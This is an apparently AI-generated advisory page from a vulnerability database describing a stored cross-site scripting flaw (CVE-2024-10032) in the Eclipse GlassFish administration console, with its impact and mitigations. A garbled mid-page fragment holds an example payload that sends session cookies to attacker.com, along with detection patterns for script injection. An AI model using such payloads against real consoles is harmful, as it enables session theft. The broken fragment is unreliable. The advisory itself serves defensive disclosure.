
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2024-10032 is a Stored Cross-Site Scripting (XSS) vulnerability in the Administration Console of Eclipse GlassFish version 7.0.15. It allows an authenticated attacker with high privileges to inject malicious scripts that are persistently stored and executed within the administration interface. The vulnerability was published on July 16, 2025, and affects the Maven package org.glassfish.main.admingui:console-cluster-plugin in versions up to and including 7.0.25. It carries a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 6.1 (Medium) (GitHub Advisory, Red Hat CVE).
The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). An authenticated attacker with administrative privileges can submit crafted input containing malicious JavaScript through the GlassFish Administration Console, which is then stored server-side and executed in the browsers of other administrators who view the affected console pages. The attack vector is network-based, requires low attack complexity, high privileges, and passive user interaction from a victim administrator. The vulnerability is tracked under GHSA-62g9-99m7-w8wv and was reported via the Eclipse security issue tracker (GitHub Advisory).
Successful exploitation allows an attacker to inject persistent malicious scripts into the GlassFish Administration Console, which execute in the context of other administrators' browser sessions. This can lead to session cookie theft, credential harvesting, unauthorized administrative actions performed on behalf of victims, and compromise of the integrity of the administration interface. The subsequent system confidentiality impact is rated High, meaning sensitive administrative data accessible through the console could be exposed to the attacker (GitHub Advisory, Red Hat CVE).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (Red Hat CVE). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.039–0.118%, placing it in the lower percentiles for near-term exploitation likelihood (GitHub Advisory). Exploitation requires an authenticated account with high (administrative) privileges, which significantly limits the attacker pool.
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field within the console.%3Cscript%3E, <script>, onerror=, onload=) in form fields.The GitHub Advisory indicates that no patched version has been formally designated for the Maven package as of the advisory publication date, though updating Eclipse GlassFish to the latest available version beyond 7.0.15 is recommended (GitHub Advisory). As interim mitigations, administrators should restrict access to the GlassFish Administration Console (port 4848) to trusted IP addresses only, implement a Content Security Policy (CSP) header, and enable browser-level XSS protections. Monitoring administrative console activity for anomalous input or behavior is also advised (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."